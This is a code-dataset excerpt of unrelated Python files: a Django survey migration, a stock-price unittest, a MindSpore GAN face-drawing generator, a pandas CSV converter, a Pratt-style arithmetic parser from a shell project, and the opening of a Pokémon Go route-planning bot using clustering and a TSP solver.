        # New per-user, per-question strategy record.
        migrations.CreateModel(
            name='Strategy',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('question_index', models.IntegerField()),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('concern', models.CharField(max_length=1000)),
                ('strategy', models.CharField(help_text='Please answer in 1 or 2 sentences. Feel free to take a minute to think about a strategy.', max_length=10000, verbose_name='Strategy: How will you determine which package is better for this concern?')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # New fields on Question.
        migrations.AddField(
            model_name='question',
            name='evidence',
            field=models.CharField(blank=True, help_text='Please refer to specific information you found and pages where you found it.', max_length=10000, null=True, verbose_name='What evidence did you find to support your rating?'),
        ),
        migrations.AddField(
            model_name='question',
            name='likert_comparison_evidence',
            field=models.IntegerField(choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4)], default=-1, verbose_name="Based on the evidence you've seen, which package is better for this concern?"),
        ),
        migrations.AddField(
            model_name='question',
            name='likert_comparison_intuition',
            field=models.IntegerField(choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4)], default=-1, verbose_name='Ignoring evidence, which package do you think is actually better for this concern?'),
        ),
        migrations.AddField(
            model_name='question',
            name='likert_coverage',
            field=models.IntegerField(choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4)], default=-1, verbose_name='I was able to view all the online information relevant to this question'),
        ),
        # Label/help-text adjustments on existing fields.
        migrations.AlterField(
            model_name='packagepair',
            name='package1',
            field=models.CharField(max_length=1000, verbose_name='What is the first package you will be learning about?'),
        ),
        migrations.AlterField(
            model_name='packagepair',
            name='package2',
            field=models.CharField(max_length=1000, verbose_name='What is the second one?'),
        ),
        migrations.AlterField(
            model_name='question',
            name='likert_confidence',
            field=models.IntegerField(choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4)], default=-1, verbose_name='How confident are you?'),
        ),
        migrations.AlterField(
            model_name='question',
            name='strategy',
            field=models.CharField(blank=True, help_text='What documents did you look at and why?', max_length=4000, null=True, verbose_name='What was your strategy for answering this question?'),
        ),
        migrations.AlterField(
            model_name='question',
            name='url1',
            field=models.CharField(blank=True, max_length=1000, null=True, verbose_name='URL of indicator 1'),
        ),
        migrations.AlterField(
            model_name='question',
            name='url1_what',
            field=models.CharField(blank=True, max_length=10000, null=True, verbose_name='What information on that site helped you?'),
        ),
        migrations.AlterField(
            model_name='question',
            name='url1_where',
            field=models.CharField(blank=True, max_length=1000, null=True, verbose_name='What web site does this URL point to?'),
        ),
        migrations.AlterField(
            model_name='question',
            name='url1_why',
            field=models.CharField(blank=True, max_length=10000, null=True, verbose_name='Why was this helpful?'),
        ),
    ]
| StarcoderdataPython |
4825302 | """
@brief test log(time=3s)
"""
import unittest
import datetime
import warnings
from pyquickhelper.loghelper import fLOG
from pyquickhelper.pycode import get_temp_folder
from pyensae.finance.astock import StockPrices, StockPricesHTTPException
class TestStockUrlGoogle(unittest.TestCase):
    """Checks that MSFT price history can be fetched from Google Finance."""

    def test_download_stock_google(self):
        """Downloads NASDAQ:MSFT history since 2014-01-15 and checks the URL."""
        fLOG(
            __file__,
            self._testMethodName,
            OutputPrint=__name__ == "__main__")
        temp_dir = get_temp_folder(__file__, "temp_url_google")
        try:
            prices = StockPrices("NASDAQ:MSFT", folder=temp_dir,
                                 begin=datetime.datetime(2014, 1, 15))
        except StockPricesHTTPException as exc:
            # Network access to the remote service is flaky; downgrade a
            # transport failure to a warning rather than a test failure.
            warnings.warn(str(exc))
            return
        frame = prices.dataframe
        earliest = frame.Date.min()
        self.assertIn("2014", str(earliest))
        self.assertTrue(prices.url_.startswith(
            "https://finance.google.com/finance/historical?q=NASDAQ:MSFT&startdate=Jan+15%2C+2014"))
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
176873 | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
The Generator of APDrawingGAN
"""
from mindspore import nn, ops
import mindspore
from src.networks import controller as networks
class PadOnes(nn.Cell):
    """Pad an NCHW tensor with a border of ones.

    margin is ((top, bottom), (left, right)) in pixels. Padding with ones
    corresponds to white in the [-1, 1]-normalized image convention used
    by the min-pooling combine path below.
    """

    def __init__(self, margin):
        super(PadOnes, self).__init__()
        self.margin = margin
        self.ones = ops.Ones()
        # Concat along height (axis 2) and width (axis 3) respectively.
        self.concat_h = ops.Concat(2)
        self.concat_w = ops.Concat(3)

    def construct(self, item):
        """Return `item` surrounded by the configured margin of ones."""
        bs, nc, h, w = item.shape
        m_top = self.ones((bs, nc, self.margin[0][0], w), mindspore.float32)
        m_down = self.ones((bs, nc, self.margin[0][1], w), mindspore.float32)
        # Height grows after the vertical concat; the side strips below
        # must span the new height.
        h = h + self.margin[0][0] + self.margin[0][1]
        m_left = self.ones((bs, nc, h, self.margin[1][0]), mindspore.float32)
        m_right = self.ones((bs, nc, h, self.margin[1][1]), mindspore.float32)
        item = self.concat_h((m_top, item, m_down))
        item = self.concat_w((m_left, item, m_right))
        return item
class Generator(nn.Cell):
    """
    Define generator model of APDrawingGAN

    A global generator produces a whole-image drawing; when use_local is
    set, six part generators (eyes, nose, mouth, hair, background) produce
    local drawings that are stitched together and fused with the global
    result by a combiner network.
    """

    def __init__(self, opt):
        super(Generator, self).__init__()
        # init parameters
        self.support_non_tensor_inputs = True
        self.fineSize = opt.fineSize
        self.which_direction = opt.which_direction
        self.use_local = opt.use_local
        self.isTrain = opt.isTrain
        self.isExport = opt.isExport
        self.comb_op = opt.comb_op
        self.EYE_H = opt.EYE_H
        self.EYE_W = opt.EYE_W
        self.NOSE_H = opt.NOSE_H
        self.NOSE_W = opt.NOSE_W
        self.MOUTH_H = opt.MOUTH_H
        self.MOUTH_W = opt.MOUTH_W
        # NOTE(review): duplicate of the assignment above — harmless but
        # one of the two could be removed.
        self.support_non_tensor_inputs = True
        # define Generator
        self.netG = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG, opt.norm,
                                      not opt.no_dropout, opt.init_type, opt.init_gain,
                                      opt.nnG)
        self.G_network_names = ['G']
        if self.use_local:
            print('G net use local')
            self.netGLEyel = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, 'partunet', opt.norm,
                                               not opt.no_dropout, opt.init_type, opt.init_gain, 3)
            self.netGLEyer = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, 'partunet', opt.norm,
                                               not opt.no_dropout, opt.init_type, opt.init_gain, 3)
            self.netGLNose = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, 'partunet', opt.norm,
                                               not opt.no_dropout, opt.init_type, opt.init_gain, 3)
            self.netGLMouth = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, 'partunet', opt.norm,
                                                not opt.no_dropout, opt.init_type, opt.init_gain, 3)
            self.netGLHair = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, 'partunet2', opt.norm,
                                               not opt.no_dropout, opt.init_type, opt.init_gain, 4)
            self.netGLBG = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, 'partunet2', opt.norm,
                                             not opt.no_dropout, opt.init_type, opt.init_gain, 4)
            self.netGCombine = networks.define_G(2 * opt.output_nc, opt.output_nc, opt.ngf, 'combiner', opt.norm,
                                                 not opt.no_dropout, opt.init_type, opt.init_gain, 2)
            self.G_network_names = ['G', 'GLEyel', 'GLEyer', 'GLNose', 'GLMouth', 'GLHair', 'GLBG', 'GCombine']

    def _addone_with_mask(self, A, mask):
        # Keep A where mask==1, force masked-out regions to 1 (white).
        ones = ops.Ones()
        return ((A / 2 + 0.5) * mask + (ones(mask.shape, mindspore.float32) - mask)) * 2 - 1

    def _masked(self, A, mask):
        # Keep A where mask==1, force masked-out regions to -1 (black).
        return (A / 2 + 0.5) * mask * 2 - 1

    def _partCombiner2_bg(self, eyel, eyer, nose, mouth, hair, bg, maskh, maskb, comb_op=1):
        """
        combine all parts

        Pads each facial part to full-image position and merges everything
        with element-wise max (comb_op == 0, black padding) or min
        (comb_op != 0, white padding).
        """
        if comb_op == 0:
            # use max pooling, pad black for eyes etc
            hair = self._masked(hair, maskh)
            bg = self._masked(bg, maskb)
        else:
            # use min pooling, pad white for eyes etc
            hair = self._addone_with_mask(hair, maskh)
            bg = self._addone_with_mask(bg, maskb)
        # Pad operators are configured by set_pad() before construct runs.
        eyel_p = self.pad_el(eyel)
        eyer_p = self.pad_er(eyer)
        nose_p = self.pad_no(nose)
        mouth_p = self.pad_mo(mouth)
        if comb_op == 0:
            maximum = ops.Maximum()
            eyes = maximum(eyel_p, eyer_p)
            eye_nose = maximum(eyes, nose_p)
            eye_nose_mouth = maximum(eye_nose, mouth_p)
            eye_nose_mouth_hair = maximum(hair, eye_nose_mouth)
            result = maximum(bg, eye_nose_mouth_hair)
        else:
            minimum = ops.Minimum()
            eyes = minimum(eyel_p, eyer_p)
            eye_nose = minimum(eyes, nose_p)
            eye_nose_mouth = minimum(eye_nose, mouth_p)
            eye_nose_mouth_hair = minimum(hair, eye_nose_mouth)
            result = minimum(bg, eye_nose_mouth_hair)
        return result

    def _inverse_mask(self, mask):
        # 1 - mask, i.e. the complement of a binary mask.
        ones = ops.Ones()
        return ones(mask.shape, mindspore.float32) - mask

    def _generate_output(self, real_A, real_A_bg, real_A_eyel,
                         real_A_eyer, real_A_nose, real_A_mouth,
                         real_A_hair, mask, mask2):
        """
        generate output

        Returns the fused drawing (plus per-part drawings when training
        with use_local and not exporting); falls back to the global
        generator's output when use_local is off.
        """
        # global
        fake_B0 = self.netG(real_A)
        # local
        if self.use_local:
            fake_B_eyel = self.netGLEyel(real_A_eyel)
            fake_B_eyer = self.netGLEyer(real_A_eyer)
            fake_B_nose = self.netGLNose(real_A_nose)
            fake_B_mouth = self.netGLMouth(real_A_mouth)
            fake_B_hair = self.netGLHair(real_A_hair)
            fake_B_bg = self.netGLBG(real_A_bg)
            fake_B1 = self._partCombiner2_bg(fake_B_eyel, fake_B_eyer, fake_B_nose, fake_B_mouth, fake_B_hair,
                                             fake_B_bg, mask * mask2, self._inverse_mask(mask2),
                                             self.comb_op)
            # Fuse global and local results channel-wise through the combiner.
            op = ops.Concat(1)
            output = op((fake_B0, fake_B1))
            fake_B = self.netGCombine(output)
            if self.isExport:
                return fake_B
            return fake_B, fake_B_eyel, fake_B_eyer, fake_B_nose, fake_B_mouth, \
                   self._masked(fake_B_hair, mask * mask2), self._masked(fake_B_bg, self._inverse_mask(mask2))
        return fake_B0

    def set_Grad(self, value):
        # NOTE(review): netGCombine is not toggled here — confirm whether
        # that is intentional.
        self.netG.set_grad(value)
        if self.use_local:
            self.netGLEyer.set_grad(value)
            self.netGLEyel.set_grad(value)
            self.netGLMouth.set_grad(value)
            self.netGLNose.set_grad(value)
            self.netGLHair.set_grad(value)
            self.netGLBG.set_grad(value)
        return True

    def set_pad(self, center):
        """
        set padding function

        center is a 4x2 array of part centers (eyel, eyer, nose, mouth) in
        image coordinates; part sizes are scaled from the 256px reference.
        """
        IMAGE_SIZE = self.fineSize
        ratio = IMAGE_SIZE / 256
        EYE_W = self.EYE_W * ratio
        EYE_H = self.EYE_H * ratio
        NOSE_W = self.NOSE_W * ratio
        NOSE_H = self.NOSE_H * ratio
        MOUTH_W = self.MOUTH_W * ratio
        MOUTH_H = self.MOUTH_H * ratio
        self.pad_el = PadOnes((
            (int(center[0, 1] - EYE_H / 2), int(IMAGE_SIZE - (center[0, 1] + EYE_H / 2))),
            (int(center[0, 0] - EYE_W / 2), int(IMAGE_SIZE - (center[0, 0] + EYE_W / 2)))
        ))
        self.pad_er = PadOnes((
            (int(center[1, 1] - EYE_H / 2), int(IMAGE_SIZE - (center[1, 1] + EYE_H / 2))),
            (int(center[1, 0] - EYE_W / 2), int(IMAGE_SIZE - (center[1, 0] + EYE_W / 2)))
        ))
        self.pad_no = PadOnes((
            (int(center[2, 1] - NOSE_H / 2), int(IMAGE_SIZE - (center[2, 1] + NOSE_H / 2))),
            (int(center[2, 0] - NOSE_W / 2), int(IMAGE_SIZE - (center[2, 0] + NOSE_W / 2)))
        ))
        self.pad_mo = PadOnes((
            (int(center[3, 1] - MOUTH_H / 2), int(IMAGE_SIZE - (center[3, 1] + MOUTH_H / 2))),
            (int(center[3, 0] - MOUTH_W / 2), int(IMAGE_SIZE - (center[3, 0] + MOUTH_W / 2)))
        ))

    def construct(self, real_A, real_A_bg, real_A_eyel, real_A_eyer,
                  real_A_nose, real_A_mouth, real_A_hair,
                  mask, mask2):
        """Forward pass: delegate to _generate_output."""
        return self._generate_output(real_A, real_A_bg, real_A_eyel,
                                     real_A_eyer, real_A_nose, real_A_mouth,
                                     real_A_hair, mask, mask2)
| StarcoderdataPython |
4816421 | <filename>06_food_reviews/01_preprocessing.py<gh_stars>0
"""
@author: <EMAIL>
@site: e-smartdata.org
"""
import pandas as pd

# Load the Amazon food reviews dump and re-export it as tab-separated
# values without header or index, ready for downstream NLP tooling.
df = pd.read_csv('Reviews.csv')
print(df.info())
df.to_csv('prep_reviews.tsv', sep='\t', header=False, index=False)
| StarcoderdataPython |
3349703 | """
tdop.py - Library for expression parsing.
"""
from _devbuild.gen.id_kind_asdl import Id, Id_t
from _devbuild.gen.syntax_asdl import (
arith_expr, arith_expr_e, arith_expr_t,
arith_expr__VarRef, arith_expr__Binary, arith_expr__ArithWord,
sh_lhs_expr, sh_lhs_expr_t,
word_t,
)
from _devbuild.gen.types_asdl import lex_mode_e
from core.util import p_die
from core import ui
from mycpp import mylib
from mycpp.mylib import tagswitch
from osh import word_
from typing import (
Callable, List, Dict, Tuple, Any, cast, TYPE_CHECKING
)
if TYPE_CHECKING: # break circular dep
from osh.word_parse import WordParser
from core import optview
# Handler-callback signatures for the Pratt parser: 'led' (left denotation,
# consumes a left operand) and 'nud' (null denotation, prefix position).
LeftFunc = Callable[['TdopParser', word_t, arith_expr_t, int], arith_expr_t]
NullFunc = Callable[['TdopParser', word_t, int], arith_expr_t]
def IsIndexable(node):
  # type: (arith_expr_t) -> bool
  """
  a[1] is allowed but a[1][1] isn't

  Only plain variable references may be indexed.
  """
  return node.tag_() == arith_expr_e.VarRef

  # TODO: x$foo[1] is also allowed
  #return node.tag_() in (arith_expr_e.VarRef, arith_expr_e.ArithWord)
def ToLValue(node, parse_unimplemented):
  # type: (arith_expr_t, bool) -> sh_lhs_expr_t
  """Determine if a node is a valid L-value by whitelisting tags.

  Returns a sh_lhs_expr node, or None when the expression cannot be
  assigned to.

  Valid:
    x = y
    a[1] = y
  Invalid:
    a[0][0] = y
  """
  UP_node = node
  with tagswitch(node) as case:
    if case(arith_expr_e.VarRef):
      node = cast(arith_expr__VarRef, UP_node)
      # For consistency with osh/cmd_parse.py, append a span_id.
      # TODO: (( a[ x ] = 1 )) and a[x]=1 should use different LST nodes.
      # sh_lhs_expr should be an "IR".
      n = sh_lhs_expr.Name(node.token.val)
      n.spids.append(node.token.span_id)
      return n
    elif case(arith_expr_e.ArithWord):
      # Only a placeholder when parse_unimplemented is on; otherwise this
      # branch falls through to the final 'return None'.
      if parse_unimplemented:
        node = cast(arith_expr__ArithWord, UP_node)
        return sh_lhs_expr.Name('DUMMY_parse_unimplemented')
    elif case(arith_expr_e.Binary):
      node = cast(arith_expr__Binary, UP_node)
      if node.op_id == Id.Arith_LBracket:
        UP_left = node.left
        if node.left.tag_() == arith_expr_e.VarRef:
          left = cast(arith_expr__VarRef, UP_left)
          return sh_lhs_expr.IndexedName(left.token.val, node.right)
        if parse_unimplemented and node.left.tag_() == arith_expr_e.ArithWord:
          return sh_lhs_expr.IndexedName(
              'DUMMY_parse_unimplemented', node.right)

  # But a[0][0] = 1 is NOT valid.
  return None
#
# Null Denotation
#
def NullError(p, t, bp):
  # type: (TdopParser, word_t, int) -> arith_expr_t
  """nud for tokens that may not appear in prefix position; always raises."""
  # TODO: I need position information
  p_die("Token can't be used in prefix position", word=t)
  return None  # never reached
def NullConstant(p, w, bp):
  # type: (TdopParser, word_t, int) -> arith_expr_t
  """nud for operands: a variable reference or a literal/word constant."""
  var_name_token = word_.LooksLikeArithVar(w)
  if var_name_token:
    return arith_expr.VarRef(var_name_token)

  return arith_expr.ArithWord(w)
def NullParen(p, t, bp):
  # type: (TdopParser, word_t, int) -> arith_expr_t
  """ Arithmetic grouping: parse the inner expression and require ')'. """
  r = p.ParseUntil(bp)
  p.Eat(Id.Arith_RParen)
  return r
def NullPrefixOp(p, w, bp):
  # type: (TdopParser, word_t, int) -> arith_expr_t
  """Prefix operator.

  Low precedence: return, raise, etc.
    return x+y is return (x+y), not (return x) + y

  High precedence: logical negation, bitwise complement, etc.
    !x && y is (!x) && y, not !(x && y)
  """
  # The operand binds with the operator's own binding power.
  right = p.ParseUntil(bp)
  return arith_expr.Unary(word_.ArithId(w), right)
#
# Left Denotation
#
def LeftError(p, t, left, rbp):
  # type: (TdopParser, word_t, arith_expr_t, int) -> arith_expr_t
  """led for tokens that may not appear in infix position; always raises."""
  # Hm is this not called because of binding power?
  p_die("Token can't be used in infix position", word=t)
  return None  # never reached
def LeftBinaryOp(p, w, left, rbp):
  # type: (TdopParser, word_t, arith_expr_t, int) -> arith_expr_t
  """ Normal binary operator like 1+2 or 2*3, etc. """
  # TODO: w should be a Token, and we should extract the token from it.
  return arith_expr.Binary(word_.ArithId(w), left, p.ParseUntil(rbp))
def LeftAssign(p, w, left, rbp):
  # type: (TdopParser, word_t, arith_expr_t, int) -> arith_expr_t
  """ Assignment operator like x += 1 or a[i] += 1; validates the LHS. """
  lhs = ToLValue(left, p.parse_opts.parse_unimplemented())
  if lhs is None:
    # TODO: It would be nice to point at 'left', but osh/word.py doesn't
    # support arbitrary arith_expr_t.
    #p_die("Can't assign to this expression", word=w)
    p_die("Left-hand side of this assignment is invalid", word=w)
  return arith_expr.BinaryAssign(word_.ArithId(w), lhs, p.ParseUntil(rbp))
#
# Parser definition
#
# Helpers used only for C++ code generation from this Python source;
# excluded from the mycpp translation itself.
if mylib.PYTHON:
  def _ModuleAndFuncName(f):
    # type: (Any) -> Tuple[str, str]
    namespace = f.__module__.split('.')[-1]
    return namespace, f.__name__

  def _CppFuncName(f):
    # type: (Any) -> str
    return '%s::%s' % _ModuleAndFuncName(f)
class LeftInfo(object):
  """Row for operator.

  In C++ this should be a big array.

  Holds the led callback plus left/right binding powers for one token.
  """

  def __init__(self, led=None, lbp=0, rbp=0):
    # type: (LeftFunc, int, int) -> None
    self.led = led or LeftError
    self.lbp = lbp
    self.rbp = rbp

  def __str__(self):
    # type: () -> str
    """Used by C++ code generation."""
    return '{ %s, %d, %d },' % (_CppFuncName(self.led), self.lbp, self.rbp)

  def ModuleAndFuncName(self):
    # type: () -> Tuple[str, str]
    """Used by C++ code generation."""
    return _ModuleAndFuncName(self.led)
class NullInfo(object):
  """Row for operator.

  In C++ this should be a big array.

  Holds the nud callback plus its binding power for one token.
  """

  def __init__(self, nud=None, bp=0):
    # type: (NullFunc, int) -> None
    self.nud = nud or LeftError
    self.bp = bp

  def __str__(self):
    # type: () -> str
    """Used by C++ code generation."""
    return '{ %s, %d },' % (_CppFuncName(self.nud), self.bp)

  def ModuleAndFuncName(self):
    # type: () -> Tuple[str, str]
    """Used by C++ code generation."""
    return _ModuleAndFuncName(self.nud)
class ParserSpec(object):
  """Specification for a TDOP parser.

  This can be compiled to a table in C++.

  Maps each token id to its NullInfo (prefix handling) and LeftInfo
  (infix handling).
  """

  def __init__(self):
    # type: () -> None
    self.nud_lookup = {}  # type: Dict[Id_t, NullInfo]
    self.led_lookup = {}  # type: Dict[Id_t, LeftInfo]

  def Null(self, bp, nud, tokens):
    # type: (int, NullFunc, List[Id_t]) -> None
    """Register a token that doesn't take anything on the left.

    Examples: constant, prefix operator, error.
    """
    for token in tokens:
      self.nud_lookup[token] = NullInfo(nud=nud, bp=bp)
      if token not in self.led_lookup:
        self.led_lookup[token] = LeftInfo()  # error

  def _RegisterLed(self, lbp, rbp, led, tokens):
    # type: (int, int, LeftFunc, List[Id_t]) -> None
    # Shared implementation for Left / LeftRightAssoc.
    for token in tokens:
      if token not in self.nud_lookup:
        self.nud_lookup[token] = NullInfo(NullError)
      self.led_lookup[token] = LeftInfo(lbp=lbp, rbp=rbp, led=led)

  def Left(self, bp, led, tokens):
    # type: (int, LeftFunc, List[Id_t]) -> None
    """Register a token that takes an expression on the left."""
    self._RegisterLed(bp, bp, led, tokens)

  def LeftRightAssoc(self, bp, led, tokens):
    # type: (int, LeftFunc, List[Id_t]) -> None
    """Register a right associative operator."""
    # rbp = bp - 1 makes the recursive call accept operators of equal
    # precedence, yielding right associativity.
    self._RegisterLed(bp, bp - 1, led, tokens)

  def LookupNud(self, token):
    # type: (Id_t) -> NullInfo
    try:
      nud = self.nud_lookup[token]
    except KeyError:
      raise AssertionError('No nud for token %r' % token)
    return nud

  def LookupLed(self, token):
    # type: (Id_t) -> LeftInfo
    """Get a left_info for the token."""
    return self.led_lookup[token]
class TdopParser(object):
  """
  Parser state. Current token and lookup stack.

  Classic Pratt / top-down operator precedence parser driven by a
  ParserSpec table, reading words from a WordParser in arithmetic mode.
  """

  def __init__(self, spec, w_parser, parse_opts):
    # type: (ParserSpec, WordParser, optview.Parse) -> None
    self.spec = spec
    self.w_parser = w_parser
    self.parse_opts = parse_opts
    self.cur_word = None  # type: word_t  # current token
    self.op_id = Id.Undefined_Tok

  def AtToken(self, token_type):
    # type: (Id_t) -> bool
    return self.op_id == token_type

  def Eat(self, token_type):
    # type: (Id_t) -> None
    """Assert that we're at the current token and advance."""
    if not self.AtToken(token_type):
      p_die('Parser expected %s, got %s',
            ui.PrettyId(token_type), ui.PrettyId(self.op_id),
            word=self.cur_word)
    self.Next()

  def Next(self):
    # type: () -> bool
    # Advance to the next word and cache its arithmetic token id.
    self.cur_word = self.w_parser.ReadWord(lex_mode_e.Arith)
    self.op_id = word_.ArithId(self.cur_word)
    return True

  def ParseUntil(self, rbp):
    # type: (int) -> arith_expr_t
    """
    Parse to the right, eating tokens until we encounter a token with binding
    power LESS THAN OR EQUAL TO rbp.
    """
    # TODO: use Kind.Eof
    if self.op_id in (Id.Eof_Real, Id.Eof_RParen, Id.Eof_Backtick):
      p_die('Unexpected end of input', word=self.cur_word)

    t = self.cur_word
    null_info = self.spec.LookupNud(self.op_id)

    self.Next()  # skip over the token, e.g. ! ~ + -
    node = null_info.nud(self, t, null_info.bp)

    while True:
      t = self.cur_word
      try:
        left_info = self.spec.LookupLed(self.op_id)
      except KeyError:
        raise AssertionError('Invalid token %s' % t)

      # Examples:
      # If we see 1*2+  , rbp = 27 and lbp = 25, so stop.
      # If we see 1+2+  , rbp = 25 and lbp = 25, so stop.
      # If we see 1**2**, rbp = 26 and lbp = 27, so keep going.
      if rbp >= left_info.lbp:
        break
      self.Next()  # skip over the token, e.g. / *

      node = left_info.led(self, t, node, left_info.rbp)

    return node

  def Parse(self):
    # type: () -> arith_expr_t
    """Entry point: prime the first token, then parse a full expression."""
    self.Next()  # may raise ParseError
    return self.ParseUntil(0)
| StarcoderdataPython |
4809730 | #!/usr/bin/env python
"""
Copyright (c) 2016 <EMAIL>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
OR OTHER DEALINGS IN THE SOFTWARE.
"""
import os
import json
import logging
import argparse
import getpass
import time
import webbrowser
import sys
import traceback
from client import Client
from pgoapi.exceptions import NotLoggedInException
from geopy.geocoders import GoogleV3
from ortools.constraint_solver import pywrapcp
# You need to import routing_enums_pb2 after pywrapcp!
from geopy.distance import great_circle
import numpy as np
from sklearn.cluster import DBSCAN
from sklearn import metrics
from sklearn.datasets.samples_generator import make_blobs
from sklearn.preprocessing import StandardScaler
import matplotlib.pyplot as plt
# Logging setup: DEBUG goes to log.log (file handler currently disabled),
# INFO and above to the console for this module and the 'client' module.
log = logging.getLogger(__name__)
rootLogger = logging.getLogger()
rootLogger.setLevel(logging.DEBUG)

logFormatter = logging.Formatter('%(asctime)s [%(module)10s] [%(levelname)5s] %(message)s')

fileHandler = logging.FileHandler('log.log')
fileHandler.setFormatter(logFormatter)
fileHandler.setLevel(logging.DEBUG)
# rootLogger.addHandler(fileHandler)

consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
consoleHandler.setLevel(logging.INFO)
logging.getLogger(__name__).addHandler(consoleHandler)
logging.getLogger('client').addHandler(consoleHandler)
class Cluster():
    """DBSCAN-based filter: keep only the pokestops in the densest cluster.

    Python 2 code. solve() returns the subset of the input list whose
    points are core samples of the largest DBSCAN cluster.
    """

    def __init__(self, lst):
        # lst: dicts with 'latitude'/'longitude' keys.
        self.lst = lst
        print 'Pokestop = ', len(self.lst)

    def solve(self):
        """Cluster lat/lon points and return members of the biggest core set."""
        X = []
        for p in self.lst:
            X.append([p['latitude'], p['longitude']])
        X = np.array(X)

        # eps is in raw degrees (~100m at the equator) — TODO confirm scale.
        db = DBSCAN(eps=0.001, min_samples=2).fit(X)
        core_samples_mask = np.zeros_like(db.labels_, dtype=bool)
        core_samples_mask[db.core_sample_indices_] = True
        labels = db.labels_

        # Number of clusters in labels, ignoring noise if present.
        n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)

        unique_labels = set(labels)
        colors = plt.cm.Spectral(np.linspace(0, 1, len(unique_labels)))
        # Track the boolean mask (_k) of the largest core cluster seen.
        _max = 0
        _k = -1
        for k, col in zip(unique_labels, colors):
            if k == -1:
                # Black used for noise.
                col = 'k'

            class_member_mask = (labels == k)

            xy = X[class_member_mask & core_samples_mask]
            plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=col,
                     markeredgecolor='k', markersize=14)
            if len(xy) > _max:
                _max = len(xy)
                _k = class_member_mask & core_samples_mask

            xy = X[class_member_mask & ~core_samples_mask]
            plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=col,
                     markeredgecolor='k', markersize=6)

        plt.title('Estimated number of clusters: %d' % n_clusters_)
        # plt.show()

        # Select the original dicts flagged by the winning mask.
        ret = []
        for i in range(len(_k)):
            if _k[i]:
                ret.append(self.lst[i])
        return ret
class TSP(object):
    """Create callback to calculate distances between points.

    Orders a list of lat/lon dicts into a short walking route using the
    or-tools routing solver (single vehicle travelling-salesman setup).
    """

    def __init__(self, lst):
        self.lst = lst
        self.tsp_size = len(lst)
        # Precompute the pairwise great-circle distance matrix in meters.
        self.matrix = {}
        for from_node in range(len(lst)):
            self.matrix[from_node] = {}
            for to_node in range(len(lst)):
                if from_node == to_node:
                    self.matrix[from_node][to_node] = 0
                else:
                    a = (lst[from_node]['latitude'], lst[from_node]['longitude'])
                    b = (lst[to_node]['latitude'], lst[to_node]['longitude'])
                    self.matrix[from_node][to_node] = great_circle(a, b).meters

    def distance(self, from_node, to_node):
        # Arc-cost callback for the routing model.
        return self.matrix[from_node][to_node]

    def solve(self):
        """Return the input points reordered along the solved route."""
        if self.tsp_size <= 0:
            return []
        routing = pywrapcp.RoutingModel(self.tsp_size, 1)

        callback = self.distance
        routing.SetArcCostEvaluatorOfAllVehicles(callback)
        assignment = routing.Solve()
        if assignment:
            print "TSP: total dist =", assignment.ObjectiveValue()
            # Only one route here; otherwise iterate from 0 to routing.vehicles() - 1
            route_number = 0
            index = routing.Start(route_number)  # Index of the variable for the starting node.
            index = routing.Start(0)
            ret = []
            sys.stdout.write('TSP: ')
            while not routing.IsEnd(index):
                ret.append(self.lst[routing.IndexToNode(index)])
                next_index = assignment.Value(routing.NextVar(index))
                dist = int(self.distance(routing.IndexToNode(index), routing.IndexToNode(next_index)))
                sys.stdout.write(str(dist) + ' -> ')
                index = next_index
            ret.append(self.lst[routing.IndexToNode(index)])
            print ''
            return ret
        else:
            # NOTE: implicitly returns None here, unlike the [] above.
            print 'TSP: no solution.'
def get_pos_by_name(location_name):
geolocator = GoogleV3()
while True:
try:
loc = geolocator.geocode(location_name)
break
except:
print "geolocator err, retry after 3s"
time.sleep(3)
log.info('Your given location: %s', loc.address.encode('utf-8'))
log.info('lat/long/alt: %s %s %s', loc.latitude, loc.longitude, loc.altitude)
return (loc.latitude, loc.longitude)
def init_config():
    """Parse CLI arguments, falling back to values loaded from config.json.

    Returns an argparse.Namespace on success, or None when auth_service is
    not 'ptc' or 'google'. Command-line values take precedence over the
    JSON file; the password is prompted for interactively when absent from
    both sources.
    """
    parser = argparse.ArgumentParser()

    # If config file exists, load variables from json
    config_file = "config.json"
    load = {}
    if os.path.isfile(config_file):
